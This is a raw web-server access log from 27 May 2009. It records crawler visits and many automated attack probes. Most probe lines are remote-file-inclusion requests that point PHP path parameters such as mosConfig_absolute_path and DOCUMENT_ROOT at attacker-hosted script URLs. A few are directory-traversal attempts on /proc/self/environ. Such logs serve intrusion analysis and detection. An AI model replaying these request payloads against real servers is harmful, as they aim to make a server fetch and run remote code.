220.79.47.122 - - [27/May/2009:19:05:17 -0500] "GET /logs/access_log.1241740800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
74.52.48.74 - - [27/May/2009:19:06:07 -0500] "GET /logs/errors.php?error=http://www.centrsoft.ru/logo.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.826"
74.52.48.74 - - [27/May/2009:19:06:07 -0500] "GET /errors.php?error=http://www.centrsoft.ru/logo.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.826"
77.221.130.2 - - [27/May/2009:19:09:39 -0500] "GET /e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
77.221.130.2 - - [27/May/2009:19:09:39 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
220.181.7.97 - - [27/May/2009:19:09:55 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
132.239.8.103 - - [27/May/2009:19:11:44 -0500] "GET /logs//maillist//install/install3.php?database=none&cabsolute_path=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
132.239.8.103 - - [27/May/2009:19:11:44 -0500] "GET /logs/access_log.1233964800//maillist//install/install3.php?database=none&cabsolute_path=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
132.239.8.103 - - [27/May/2009:19:11:44 -0500] "GET //maillist//install/install3.php?database=none&cabsolute_path=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
132.239.8.103 - - [27/May/2009:19:11:54 -0500] "GET /logs/access_log.1234051200//maillist//install/install3.php?database=none&cabsolute_path=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /logs/access_log.1238025600/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /logs/access_log.1238025600/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
116.125.126.72 - - [27/May/2009:19:12:49 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
65.55.106.185 - - [27/May/2009:19:14:46 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.185 - - [27/May/2009:19:15:39 -0500] "GET /logs/access_log.1202947200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [27/May/2009:19:22:20 -0500] "GET /logs/access_log.1110585600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [27/May/2009:19:22:21 -0500] "GET /logs/access_log.1139788800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [27/May/2009:19:22:23 -0500] "GET /logs/access_log.1222387200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [27/May/2009:19:22:24 -0500] "GET /logs/access_log.1162857600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [27/May/2009:19:22:25 -0500] "GET /logs/access_log.1178841600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [27/May/2009:19:30:21 -0500] "GET /logs/access_log.1178409600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [27/May/2009:19:31:01 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 200 1755 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [27/May/2009:19:31:05 -0500] "GET /logs/access_log.1227052800 HTTP/1.1" 200 51391 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.165 - - [27/May/2009:19:31:07 -0500] "GET /logs/access_log.1128297600 HTTP/1.1" 200 1210 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.106.135 - - [27/May/2009:19:41:40 -0500] "GET /logs/access_log.1177372800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
132.239.8.103 - - [27/May/2009:19:41:57 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
132.239.8.103 - - [27/May/2009:19:41:57 -0500] "GET /logs/access_log.1236643200//skin/zero_vote/ask_password.php?dir=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
132.239.8.103 - - [27/May/2009:19:41:57 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
38.99.44.102 - - [27/May/2009:19:49:02 -0500] "GET /logs/access_log.1242086400 HTTP/1.0" 200 437486 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
74.52.164.18 - - [27/May/2009:19:52:39 -0500] "GET /logs//admin/include/lib.module.php?mod_root=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
74.52.164.18 - - [27/May/2009:19:52:39 -0500] "GET //admin/include/lib.module.php?mod_root=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
74.52.164.18 - - [27/May/2009:19:52:45 -0500] "GET //admin/include/lib.module.php?mod_root=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
74.52.164.18 - - [27/May/2009:19:52:45 -0500] "GET /logs//admin/include/lib.module.php?mod_root=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
217.27.212.129 - - [27/May/2009:19:53:30 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://stptcellular.net/webalizer/v1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
217.27.212.129 - - [27/May/2009:19:53:30 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://stptcellular.net/webalizer/v1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
217.27.212.129 - - [27/May/2009:19:53:30 -0500] "GET /logs/access_log.1237680000//classes/adodbt/sql.php?classes_dir=http://stptcellular.net/webalizer/v1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
217.27.212.129 - - [27/May/2009:19:53:30 -0500] "GET /logs/access_log.1236038400//classes/adodbt/sql.php?classes_dir=http://stptcellular.net/webalizer/v1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:20:23:38 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt??%0D?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:20:23:38 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt??%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
220.79.47.122 - - [27/May/2009:20:23:43 -0500] "GET /logs/access_log.1239408000/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
220.79.47.122 - - [27/May/2009:20:23:43 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.79.47.122 - - [27/May/2009:20:23:43 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
220.79.47.122 - - [27/May/2009:20:25:09 -0500] "GET /logs/access_log.1239494400/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
203.22.204.193 - - [27/May/2009:20:30:22 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
203.22.204.193 - - [27/May/2009:20:30:22 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
203.22.204.193 - - [27/May/2009:20:30:25 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
203.22.204.193 - - [27/May/2009:20:30:25 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
213.246.62.35 - - [27/May/2009:20:34:33 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
213.246.62.35 - - [27/May/2009:20:34:34 -0500] "GET /e404.php?DOCUMENT_ROOT=http://chicken.ucoz.org/botscan/id.txt???? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
87.106.67.146 - - [27/May/2009:20:38:27 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:20:38:28 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:20:38:56 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:20:38:56 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
212.117.188.207 - - [27/May/2009:20:40:53 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 200 229376 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.249.65.36 - - [27/May/2009:20:41:07 -0500] "GET / HTTP/1.1" 200 3245 "-""SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
207.182.143.50 - - [27/May/2009:20:44:15 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:20:44:15 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:20:44:15 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:20:44:22 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:20:44:27 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 338 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:20:44:27 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:20:44:27 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 343 "-""Mozilla/5.0"
207.182.143.50 - - [27/May/2009:20:44:29 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
218.1.64.133 - - [27/May/2009:20:46:10 -0500] "GET /logs/index.php?conteudo=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [27/May/2009:20:46:10 -0500] "GET /index.php?conteudo=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
218.1.64.133 - - [27/May/2009:20:46:11 -0500] "GET /logs/errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.1.64.133 - - [27/May/2009:20:46:11 -0500] "GET /errors.php?error=http://www.sbe.es/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
218.1.64.133 - - [27/May/2009:20:46:11 -0500] "GET /index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 292 "-""XXXXXX"
218.1.64.133 - - [27/May/2009:20:46:12 -0500] "GET /logs/index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 297 "-""XXXXXX"
218.1.64.133 - - [27/May/2009:20:46:12 -0500] "GET /index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""XXXXXX"
218.1.64.133 - - [27/May/2009:20:46:12 -0500] "GET /logs/index.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""XXXXXX"
62.80.168.102 - - [27/May/2009:20:52:17 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.cowboyhits.net/images//img08.jpg???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.80.168.102 - - [27/May/2009:20:52:17 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.cowboyhits.net/images//img08.jpg???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.80.168.102 - - [27/May/2009:20:52:17 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://www.cowboyhits.net/images//img08.jpg???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.18.148.82 - - [27/May/2009:20:54:31 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.18.148.82 - - [27/May/2009:20:54:31 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
72.18.148.82 - - [27/May/2009:20:54:31 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.18.148.82 - - [27/May/2009:20:54:40 -0500] "GET /logs/access_log.1242086400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:20:54:46 -0500] "GET /logs/?_zb_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:20:54:46 -0500] "GET /?_zb_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:20:56:33 -0500] "GET /logs/?_zb_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 200 191095 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:20:56:33 -0500] "GET /?_zb_path=http://www.bhk-lab.com/board/data/ooid1.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
65.55.106.155 - - [27/May/2009:20:56:45 -0500] "GET /logs/access_log.1144195200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
132.239.8.103 - - [27/May/2009:20:57:35 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
132.239.8.103 - - [27/May/2009:20:57:35 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
132.239.8.103 - - [27/May/2009:20:57:35 -0500] "GET /logs/access_log.1233705600//modules/vwar/admin/admin.php?vwar_root=http://www.tom-merkle.de/pro/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.106.170 - - [27/May/2009:21:00:09 -0500] "GET /logs/access_log.1161129600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.182.124.1 - - [27/May/2009:21:00:23 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.0" 404 317 "-""libwww-perl/5.53"
64.182.124.1 - - [27/May/2009:21:00:23 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.0" 404 312 "-""libwww-perl/5.53"
62.72.64.125 - - [27/May/2009:21:01:37 -0500] "GET /logs/http://www.die-grenzreiter.com/content/download/idx? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
62.72.64.125 - - [27/May/2009:21:01:38 -0500] "GET /http://www.die-grenzreiter.com/content/download/idx? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:21:01:48 -0500] "GET /logs//administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:21:01:48 -0500] "GET /logs/access_log.1241654400//administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:21:01:48 -0500] "GET /logs/access_log.1237593600//administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
87.106.67.146 - - [27/May/2009:21:01:48 -0500] "GET //administrator/components/com_jreactions/panel.about.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
200.201.25.7 - - [27/May/2009:21:03:17 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
200.201.25.7 - - [27/May/2009:21:03:17 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
65.55.106.111 - - [27/May/2009:21:04:08 -0500] "GET /logs/access_log.1173312000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [27/May/2009:21:05:32 -0500] "GET /logs/access_log.1145750400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [27/May/2009:21:05:33 -0500] "GET /logs/access_log.1116374400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [27/May/2009:21:05:34 -0500] "GET /logs/access_log.1144540800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [27/May/2009:21:05:34 -0500] "GET /logs/access_log.1211500800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [27/May/2009:21:05:35 -0500] "GET /logs/access_log.1172620800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [27/May/2009:21:05:35 -0500] "GET /logs/access_log.1110326400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [27/May/2009:21:05:38 -0500] "GET /logs/access_log.1192665600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.106.67.146 - - [27/May/2009:21:12:08 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt??%0D?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
87.106.67.146 - - [27/May/2009:21:12:08 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id.txt??%0D?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
65.55.106.229 - - [27/May/2009:21:12:16 -0500] "GET /logs/access_log.1206403200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.242.6.107 - - [27/May/2009:21:15:32 -0500] "GET /?_zb_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.808"
201.242.6.107 - - [27/May/2009:21:15:41 -0500] "GET /logs/?_zb_path=http://190.220.29.155/.sys/v6id.txt??? HTTP/1.1" 200 191095 "-""libwww-perl/5.808"
220.79.47.122 - - [27/May/2009:21:15:58 -0500] "GET /?sourcedir=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
220.79.47.122 - - [27/May/2009:21:15:58 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
220.79.47.122 - - [27/May/2009:21:16:01 -0500] "GET /logs/?sourcedir=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
220.79.47.122 - - [27/May/2009:21:16:11 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.106.217 - - [27/May/2009:21:17:38 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.80.168.102 - - [27/May/2009:21:23:04 -0500] "GET /logs/access_log.1237680000//components/com_flyspray/startdown.php?file=http://www.cowboyhits.net/images//img08.jpg???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
116.254.252.16 - - [27/May/2009:21:23:04 -0500] "GET /logs/access_log.1242518400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
116.254.252.16 - - [27/May/2009:21:23:04 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
116.254.252.16 - - [27/May/2009:21:23:04 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.38.16.54 - - [27/May/2009:21:27:25 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.16.54 - - [27/May/2009:21:27:26 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.16.54 - - [27/May/2009:21:27:26 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.193.210.232 - - [27/May/2009:21:27:56 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
216.193.210.232 - - [27/May/2009:21:27:56 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
72.52.230.102 - - [27/May/2009:21:27:59 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.52.230.102 - - [27/May/2009:21:28:00 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
67.139.134.211 - - [27/May/2009:21:28:02 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.139.134.211 - - [27/May/2009:21:28:02 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.121.18.203 - - [27/May/2009:21:28:03 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
91.121.18.203 - - [27/May/2009:21:28:03 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
74.208.64.7 - - [27/May/2009:21:28:05 -0500] "GET /logs//index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
74.208.64.7 - - [27/May/2009:21:28:06 -0500] "GET //index.php?themesdir=http://www.attic-art.de//kontakt/rox.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
